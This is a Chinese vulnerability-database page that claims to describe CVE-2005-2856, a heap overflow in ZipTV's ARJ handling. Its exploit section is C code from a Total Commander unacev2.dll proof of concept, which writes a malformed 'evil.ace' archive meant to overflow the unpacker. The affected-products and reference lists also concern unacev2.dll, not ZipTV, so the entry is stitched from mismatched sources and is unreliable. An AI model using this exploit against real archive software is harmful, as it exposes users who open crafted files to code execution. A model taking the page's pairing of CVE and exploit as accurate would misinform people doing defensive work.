Microchip Data Systems ZipTV TZipTV ARJ文件处理溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110008 漏洞类型 缓冲区溢出
发布时间 2006-04-02 更新时间 2006-09-07
CVE编号 CVE-2005-2856 CNNVD-ID CNNVD-200509-086
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1633
https://www.securityfocus.com/bid/14759
https://cxsecurity.com/issue/WLB-2005100010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-086
|漏洞详情
ZipTV是一套压缩/解压工具组件的集合。ZipTV的TZipTV组件在列出ARJ文档中的文件时存在堆溢出漏洞,如果用户受骗解压了包含有超长ARJ头部块的特制ARJ文档的话,就会触发这个漏洞,导致执行任意代码。
|漏洞EXP
/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


int main()
{
	FILE *ace;
	ace = fopen("evil.ace", "w+b");
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;

}

// milw0rm.com [2006-04-02]
|受影响的产品
WinHKI WinHKI 1.67 WinHKI WinHKI 1.66 Where Is It Soft Where Is It 3.73.501 UltimateZip UltimateZip 3.0.3 UltimateZip UltimateZip 2.7.1 UltimateZip UltimateZip 3.1b
|参考资料

来源:SECUNIA
名称:16479
链接:http://secunia.com/advisories/16479
来源:BID
名称:14759
链接:http://www.securityfocus.com/bid/14759
来源:BUGTRAQ
名称:20060517SecuniaResearch:Eazelunacev2.dllBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/434279/100/0/threaded
来源:BUGTRAQ
名称:20060517SecuniaResearch:IZArcunacev2.dllBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/434234/100/0/threaded
来源:BUGTRAQ
名称:20060515SecuniaResearch:FilZipunacev2.dllBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/434011/100/0/threaded
来源:BUGTRAQ
名称:20060511SecuniaResearch:UltimateZipunacev2.dllBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/433693/100/0/threaded
来源:BUGTRAQ
名称:20060509SecuniaResearch:WhereIsItunacev2.dllBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/433352/100/0/threaded
来源:BUGTRAQ
名称:20060508SecuniaResearch:Anti-Trojanunacev2.dllBufferOverflowVulnerability
链接: